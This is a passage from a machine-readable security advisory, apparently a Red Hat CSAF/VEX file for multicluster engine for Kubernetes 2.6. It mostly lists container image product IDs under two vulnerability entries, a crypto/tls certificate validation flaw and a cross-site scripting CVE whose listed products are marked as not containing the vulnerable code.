2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:e7f321893f0f76fcf0e83225502e1367752c24c449a44810ccbed08ee3af3efb_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:f33966f40e46d3815d0a8859b4fa802e48931ba8f95957c31c9d728f6ae42340_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4b4a1fda57434c75499094003457759ec6d530ec8fcfc08c8e0c86fb6f33c68f_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:93eb3a376b3d3a878d104d8af966b8deaed7b26ceaf16bf337d70687e0e5fa17_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:c7f96198522ecf44c19fe190d603d94387b3a522e3210826c6c08c0999aabc56_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:da99e0676f28200a08e4996adb0d107713fd11f747df5abb8b58fbc95bcab827_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:43f0b3b75610ab9d19d261854e390dc01bf64777cce43a1076375b1580452908_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:583bf219ded8c4f21a696daa081720f3eb81c3676e0182fd246e6d4f1d3fb2f7_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:76a5e7db276463588b6a98c27fb8a24a8f85b73eef2fd4742b72690fa92decc3_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8efc263d78912f66ee98a3717a8cefdeb6e6b87bd8f3788d4f3712d9000d031c_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:32a81668f5cac70ec36ffc3caa97a4239d1840004afc8df2418e79bbbbf7c88d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:394ac878a493ffd61692942614165e69acbdaaa37b1f9a460996dc52d8586b82_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:ba480c9b472e0746645bcebdd6ed5559b611d410d521637a9e7092ee925af91d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d564b6f6d156280a08c0f3585673a11c4a72acc74626b5780bb39b7141170a19_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:27bb82aa0a0d0506fa45908892e379e4bf8190ee9512483c7d7b6a001eb37c09_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4e8e3b7a8a317dda2ec47a53110467177015d9cec39ee64b819a133048ee06f2_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9df56b21394d9b17bf70d49a367c004c4f76111bbcd0ae2046871631a914a5a4_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:ecc19a7bbdce3c0328fff1da64ae4f3959c9d0a67400cea11744bc5d336853ee_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:1f68b9c88d343654c87334fbc3b5c42338406b727da3c6bbf3b14fbef236b93a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:2eb31f9a7694f4b8690e168c0d8fcd0da42642ca87508e5199e4310fc56ea232_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:a1a514fcf09eda92d948a4375a599fcd45189a36a8748a2cf499a0fd12a7cb52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:edc942a663b791725f358fcef40fe2de8ad55f8f81d7ac2ff239ccefbb24ea3c_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:221cce833cfe679a7ed2674f39ed6aae065939119702188811507cf7b672996c_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:bcb17131e9d74ac42ddcb1baf13c2697a72c07dd386b871032c34144be5d9647_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d55c640d3df3705e8a861e7034f450d1c7bb5726251ba0384fd28b40bb178595_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:e006a8a7d0dc166885ba2a5f573128938ee6d56c882a71b68845b97e483d6e32_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5c4384e6f2589dedfbb0942b40187a93581b07a724ec2a84189af4f617e9416b_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5f68fd93ae28391c01fe0a44829f12494544b59c330a2902a6edaad45c7b02b3_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b6f4af9508e1a5a312c274aa19fa280970d462e16857394d843c53358ee318c2_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b9d178326c5f78df593cad595dd3b8a1329187d9f8d021201df726206b70bc49_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:2d23f9d25ffe94fbb9e794a61690cf08ac2888b053efc194c9abdcdeaea8fee5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:3fbf4c46f032eb961dc7f519f38cd93e49839ac94761e6f43de0e648d75c241a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:4196cd9623f2102f364c0662c6c6092efb19b2dba7bb60d0b156a12dccef9949_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:aaade5f90a49e8b49ccb8cc1fd74485ba78a37cab222676e2495500e95a911e6_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:07eaddc3666472876e1470d7d5bc49f28bce4176efbed07214d1284a785bc1de_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:0afadb8cc20a5a4a55a9762159ccd08de9c79abd5cd915f620eaedcae97e1dda_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:79cb2e32b2711d9986e53977c8757b2564ae3dc2cb82076adae43aeb61bc1499_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:bb24ce270fa3812316ec61cc7b5bf138ed54608e326d5ee783e040ca04b30c6e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:df9600893f99f149e15fb4a0295ed978d0cc35141a67a3a9824d339a5e13e08f_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:ed9963c1c0f2535aa753ecf341ab45890c838c49719b189fa1149ce5a36f244c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:f88156d91c826636ffbff092da3733a06f49f210d3f45c20b3d145b8033d3a14_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:fb23549a45050af95855906f65732389237ed6e907974600ee5f02fda696c7a7_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:08236bbe9754e0d9e8e11c1486fe81134ed8cb392f8157a9267e22823662fe83_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:3ef0376735304b9a8d46648aacc84adffbe3424d2ad790cbfd3a10888d60b54d_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:6ae974b35acc19fad0a42f0452bdb13d4d736ed59e3c9ce1ff448456f8f8cf3b_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:cd44c903b5ce3fc9f9c93be883f2a5c6106d1d86ad5a3596f8cb1ccb8ddc316c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:48408e0a5ec56b32fb9cfddf696c91b3fa1890679643959f3b12ddf746ddfe40_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6ebdb26020f475f5a9066777ea8aeb0bc6a99f93db9a7e6d1e0a6272528ce8e7_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:c67a2dc59ec90f77f8de8e72d4130f181e0ced37aba0a2b71d438e9221fd53fe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:f076915d0170bd2a3ae4552c9a2199dcab7016f0fe4f9e6d027a474a81dffa44_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:08b253bbac766546380de11c4eb330ab1da4cf45bace66296d6ce71a46052ccc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:3ed63b7040f9f2e43f3034c0b1ecd3479b6fb1e9cb45f34b65c6ba2cc0fdc6e1_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:491acfe31e1ded0bd8b5e6d4ce5115a5e1ef4b0ea5165635abcb21055a3c9f41_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:e32f3082cbed11fd6e5f1f65b58d9e2ab52df3298ecc63ce32dea78fdf36150e_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:071caf0cee1f904aaf5747b5c894f8e68e273c76b045e2e46f3fdc747fde0b52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:222fb4df168138dfe036cba15b0592b8d85aeb0a3907cbbcb80caa148ebd5e75_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:76e5532fdd70e237898a03f7ab0304d44684ac4d78930c04140558b780e44284_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:a7d81f1ca5781bad0fdf032192994d7aebb438b67370526b7aaf24de26ea2a4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:0389924d0daecd14270a2c80cf761400b2683b5d1f191ac63e09eddc33b6f459_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:54ec16d78dafc319cdd51ef6c7328ec9b6ad7fdf9cac5e4e47c1f510ad2a132a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:8c81477e75d355483f39b88ddfdd30b8ea6982a45aeb3cdc178b53f6e9198334_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:969cc2b05bb0fe1b00cfa728b6b0a741bf21e81aecae04aba1e0bbdd1921faa5_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:55abc89b8554cc3e314cf9f7f998101a931c3cf9b3b21e0f0cdbe26d5aba1be6_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:855c5cd1036f4a3c38f35f6d781e3f31941c91d61b699f4b714cda909b81bf70_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cb3f786b682cc31995858194dec9dfdc1ac43f6a0ceb609364bbc07c732895e9_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cc8fc81d0fb612703581e0df2f9b4262aae0d1f1af29a5facdf9dac567b95510_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2b24bab2c9db586e3de204607f606c1577ab35ef78ce9cb154b08d56a3cb70d3_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:65ee7dbee80ad40347972f9a42cb18cde25554211afbb6f0e2c1aca3405e11f2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9ce62c421421c1c2739b1e79f010539134123583ebaef7274549ba49e1c0010a_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9e7310305572d3bcbfca6bff55daa43a01039cc6384149b573c696335048e5a5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3764ca1ef9ed913896c0449b271706748517cf96e67d88ad491e225fcb0eb549_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:cd74d39b219e499f077516f6c229cddff21cd480d4ef33033d644bdbfb0b3682_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d1b6093f101ae7e4956aad52d4de99c68472f86de3094c98fc4f290926a99f4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:e84d9e60025112bcc466c1ab0c8b82dccafc34b85266f5650ff6c4fbdd9ad6c5_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:068f2fd00a2709d041c1eb2aab64ac4741a7a4b27475a722571a450ab496b655_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2c8f4c88f1ac9cd64359e990530e27ad8c3ff590e17aca5a072ef0ec674f380d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:817d332d90af406985a0611de4a171f7478d39f0afa1a6aafb7cf5eb7616ca78_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:b6b5e9e343849e851770dcdbf287b63de1a0cb8cec21cee9be2ef4fdcca445e3_amd64"]}], "threats": [{"category": "impact", "details": "Moderate"}], "title": "crypto/tls: crypto/tls: Incorrect certificate validation during TLS session resumption"}, {"cve": "CVE-2026-22029", "cwe": {"id": "CWE-79", "name": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')"}, "discovery_date": "2026-01-10T04:01:03.694749+00:00", "flags": [{"label": "vulnerable_code_not_present", "product_ids": ["multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:407afc190324598e778fc09d218da552a2430612bad6b50ff9f6bc824b788dfc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:437c27590382282a29dd543a69bbaed7ebd5421f73b98311c13f9e37c9ff553e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:865fcb2f6796be98004ad84f0fffcd7200690f56ccccf5a39af4c5888abb213e_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f82ac0d043682cc16fb832d9027464ee65f314d70ce98687f45db50e16d2b250_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:0768996d28693025a487c86c72debf1fda095282412b2c33ca0f21d8d9011b8a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5e84dda66a7735bbae425ac1a6b0e241662edb858476eb82adf72b7dff4b3916_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:9f13c6203d4ba9cde9bd8932b7e86c4a9c3396bb82235601b84f6743fb1b675f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:ed05bbaa85197e21425ed8f503f74c6717bb6f2112e9b57c9b115071777c1995_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:2ec4baacabb144497ea62482a3c0ccafb9c3794c5c89f9aebbe855d7d9829dbe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:72e64e8d1be38857af7beadc81e2f5f071f636b1d9233a70add5a1f18833ec45_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c17a0ffd9c9546016a87cdd75adbaaa742f8637a0d81975d7b76662ffe5b069d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:e05c6ff6a481e7956a58e07f10dc15470ef2af82966b2159260077bd6ba06cf7_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:4bef3dab9db981249b3a1b3a556e615226b29fdc7a6593a3970921799817129f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:901dd1ad148b84d3c1bcfa71beeaf75b836bb382bf99893f65d4629d006bcfc7_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:abdca0cc6776dba16be873853e38bc62bb9d3f1eb80f1d4bcbe7829714a019b5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:f856447bc82e37dc4da78639ff08bc1f4b4c4e0d75c3d1eeec81e3807c65ad7e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:345d589cb55ccb8afb080f04054ebc30f0cf6383742ce750f4f5656e14f4db35_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5557594c1ac0b047fea659868fdf71b8f16e0548abe8f41bf58ce80924701a16_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:8e08974a6dc10be9cb7d7a07527e8960cd93b76506355ce900e2e691208d1047_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:9d501eb84c2b7f9f860c5bb08d9adcc599e42ed0c3a0e24af3c32b686f005182_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:8690fcbd38eeec0cde0edc5c2e46683837d6247ce657c495fc791a0bb13c0450_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b41036dc59ecfd530609349da9b73dec177184662aaf69bac35e67d245815d2a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b5a7706fc69c7e1b3ad3ff03c5b0e46b44cd93ce332a74acd43da8c86b6b7163_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f0f363dc51f50bf822bff6b5f9072299c2404d8df1891243ae3ad6ba90c95f0a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:212c9c73fd1050e3f202703e7c5c5a466d1931d918e3f730d2c56bb2629337e2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:c6b10fd7009685d032e8c914cce4a1b2630ab99f2262fddd6dd32c048224e535_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d26e9fe1bf09eb1c025e28c795debabe0dda6a3f0fa112a6507b8862489de361_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:e246eb1fb572fe7ad7058afd783020e77dd61699a5ffd290000e80baa6bc0454_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:c3754441d1af76c226983b48c57b537856da6cc21272008c05dfbb8e860d25f6_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:deacb2138fe3d8a8d9ddebbbc257b4ea5be376c26df0e46a276c631752ca8a16_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:e7f321893f0f76fcf0e83225502e1367752c24c449a44810ccbed08ee3af3efb_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:f33966f40e46d3815d0a8859b4fa802e48931ba8f95957c31c9d728f6ae42340_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4b4a1fda57434c75499094003457759ec6d530ec8fcfc08c8e0c86fb6f33c68f_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:93eb3a376b3d3a878d104d8af966b8deaed7b26ceaf16bf337d70687e0e5fa17_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:c7f96198522ecf44c19fe190d603d94387b3a522e3210826c6c08c0999aabc56_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:da99e0676f28200a08e4996adb0d107713fd11f747df5abb8b58fbc95bcab827_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:43f0b3b75610ab9d19d261854e390dc01bf64777cce43a1076375b1580452908_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:583bf219ded8c4f21a696daa081720f3eb81c3676e0182fd246e6d4f1d3fb2f7_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:76a5e7db276463588b6a98c27fb8a24a8f85b73eef2fd4742b72690fa92decc3_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8efc263d78912f66ee98a3717a8cefdeb6e6b87bd8f3788d4f3712d9000d031c_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:27bb82aa0a0d0506fa45908892e379e4bf8190ee9512483c7d7b6a001eb37c09_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4e8e3b7a8a317dda2ec47a53110467177015d9cec39ee64b819a133048ee06f2_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9df56b21394d9b17bf70d49a367c004c4f76111bbcd0ae2046871631a914a5a4_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:ecc19a7bbdce3c0328fff1da64ae4f3959c9d0a67400cea11744bc5d336853ee_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:1f68b9c88d343654c87334fbc3b5c42338406b727da3c6bbf3b14fbef236b93a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:2eb31f9a7694f4b8690e168c0d8fcd0da42642ca87508e5199e4310fc56ea232_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:a1a514fcf09eda92d948a4375a599fcd45189a36a8748a2cf499a0fd12a7cb52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:edc942a663b791725f358fcef40fe2de8ad55f8f81d7ac2ff239ccefbb24ea3c_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:221cce833cfe679a7ed2674f39ed6aae065939119702188811507cf7b672996c_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:bcb17131e9d74ac42ddcb1baf13c2697a72c07dd386b871032c34144be5d9647_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d55c640d3df3705e8a861e7034f450d1c7bb5726251ba0384fd28b40bb178595_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:e006a8a7d0dc166885ba2a5f573128938ee6d56c882a71b68845b97e483d6e32_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5c4384e6f2589dedfbb0942b40187a93581b07a724ec2a84189af4f617e9416b_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5f68fd93ae28391c01fe0a44829f12494544b59c330a2902a6edaad45c7b02b3_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b6f4af9508e1a5a312c274aa19fa280970d462e16857394d843c53358ee318c2_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b9d178326c5f78df593cad595dd3b8a1329187d9f8d021201df726206b70bc49_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:2d23f9d25ffe94fbb9e794a61690cf08ac2888b053efc194c9abdcdeaea8fee5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:3fbf4c46f032eb961dc7f519f38cd93e49839ac94761e6f43de0e648d75c241a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:4196cd9623f2102f364c0662c6c6092efb19b2dba7bb60d0b156a12dccef9949_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:aaade5f90a49e8b49ccb8cc1fd74485ba78a37cab222676e2495500e95a911e6_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:07eaddc3666472876e1470d7d5bc49f28bce4176efbed07214d1284a785bc1de_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:0afadb8cc20a5a4a55a9762159ccd08de9c79abd5cd915f620eaedcae97e1dda_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:79cb2e32b2711d9986e53977c8757b2564ae3dc2cb82076adae43aeb61bc1499_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:bb24ce270fa3812316ec61cc7b5bf138ed54608e326d5ee783e040ca04b30c6e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:df9600893f99f149e15fb4a0295ed978d0cc35141a67a3a9824d339a5e13e08f_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:ed9963c1c0f2535aa753ecf341ab45890c838c49719b189fa1149ce5a36f244c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:f88156d91c826636ffbff092da3733a06f49f210d3f45c20b3d145b8033d3a14_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:fb23549a45050af95855906f65732389237ed6e907974600ee5f02fda696c7a7_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:08236bbe9754e0d9e8e11c1486fe81134ed8cb392f8157a9267e22823662fe83_arm64", "multicluster engine for Kubernetes 